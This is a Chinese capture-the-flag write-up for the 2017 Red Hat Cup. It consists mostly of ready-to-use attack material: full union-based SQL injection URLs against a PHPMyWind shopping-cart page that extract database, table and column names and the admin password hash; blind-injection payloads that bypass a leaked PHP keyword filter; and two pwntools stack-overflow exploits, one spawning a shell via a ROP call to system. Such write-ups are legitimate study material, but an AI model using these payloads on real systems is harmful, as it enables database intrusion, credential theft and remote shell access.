红帽杯2017 writeup

发表于 | 分类于 | 阅读次数:

brain(Y)

brainfuck

刮刮乐

.git泄漏
106.75.67.7:3080/.git/

后台

提示是后台密码2017年某一天。。。直接20170505进去了。。。尴尬

PHPMyWIND

通过一篇文章http://0day5.com/archives/1146/知道这个cms存在sql注入
查数据库名:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,SCHEMA_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.SCHEMATA  limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

查表名:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,TABLE_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.TABLES where TABLE_SCHEMA=0x7068706d7977696e645f6462 limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

查列名:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,COLUMN_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.COLUMNS where TABLE_NAME=0x706d775f61646d696e limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

查admin的帐号密码的hash:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from pmw_admin  limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

登录后台在在模版文件那里可以看到flag文件

thinkseeker

http://106.75.117.4:3083/index.php~ ,存在备份文件源码泄露:

<?php
error_reporting(0);
$token="e00cf25ad42683b3df678c61f42c6bda";

foreach($_GET as $key=>$value){ 
    if (is_array($value)){
        die("Bad input!");
    }
    $p="and|union|where|join|sleep|benchmark|if|sleep|benchmark|,| |\'|\"";
    if(preg_match("/".$p."/is",$value)==1){
        die("inj code!");
    }
}

parse_str($_SERVER['QUERY_STRING']);

if($token==md5("admin")){
    $link=@mysql_connect("XXXX","XXXX","XXXX");
    mysql_select_db("XXXX",$link);
    $sql="select * from user where userid = ".$userid;
    $query = mysql_query($sql);
    if (mysql_num_rows($query) == 1) { 
        $arr = mysql_fetch_array($query);
        if($arr['password'] == $password) {
            $sql="select * from info where infoid=".$infoid;
            $result=mysql_query($sql);
            $arr = mysql_fetch_array($result);
            if(empty($arr['content'])){
                echo "error sql!";
            }else{
                echo $arr['content'];
            }
        }else{
            echo "error password!";
        }
    }else{
        echo "error userid!";
    }
    mysql_close($link);
}else{
    echo "Bad token!";
}
?>
<html>
    <head>
        <title>web-test</title>
    </head>
    <body>
        <form action="" method="get">
            User ID:<input type="text" name="userid" length="50" /><br>
            Password:<input type="password" name="password" length="50" /><br>
            <input type="submit" value="submit"/>
        </form>
    </body>
</html>

可以看到需要确定的几个参数为token、password、userid、infoid
token值为:
md5(“admin”)== 21232f297a57a5a743894a0e4a801fc3
尝试userid=1,发现正确
构造payload查password:

http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid(password/**/from/**/%s/**/for/**/1))=%s&password=1&token=21232f297a57a5a743894a0e4a801fc3&infoid=

盲注脚本跑一发
猜测infoid为1,正确
构造payload查flag:

http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid((select/**/flag/**/from/**/flag)/**/from/**/%s/**/for/**/1))=%s&password=219d03ad2d752ad2806ea1de18613158&token=21232f297a57a5a743894a0e4a801fc3&infoid=1

盲注脚本跑一发

pwn1

简单的栈溢出,构造一个ROP即可
exp

from pwn import *
e=ELF('./pwn1_c1d0173e20a08feff046c8433f53fd37')
p=remote('106.75.93.221',10000)
sys_addr=p32(e.symbols['system'])
ret_addr='\x12\x12\x12\x12'
payload='A'*52+sys_addr+ret_addr+p32(e.search('sh').next())
p.sendline(payload)
p.interactive()
p.close()

pwn5

也是简单的栈溢出(只会做栈溢出。。【捂脸】)
但是开了cananry
但显然flag已经被读入了内存。当_stack_check_fail时,会打印出当前程序的名称,只需要用flag地址覆盖argv[0]的地址即可。
exp

from pwn import *
e=ELF('./pwnsss_d1b5b1011fc0ef9b3de9cb0ad261295a')
p=remote('106.75.93.221',10003)
payload='A'*292+p32(0x804a080)
p.sendline(payload)
p.interactive()
p.close()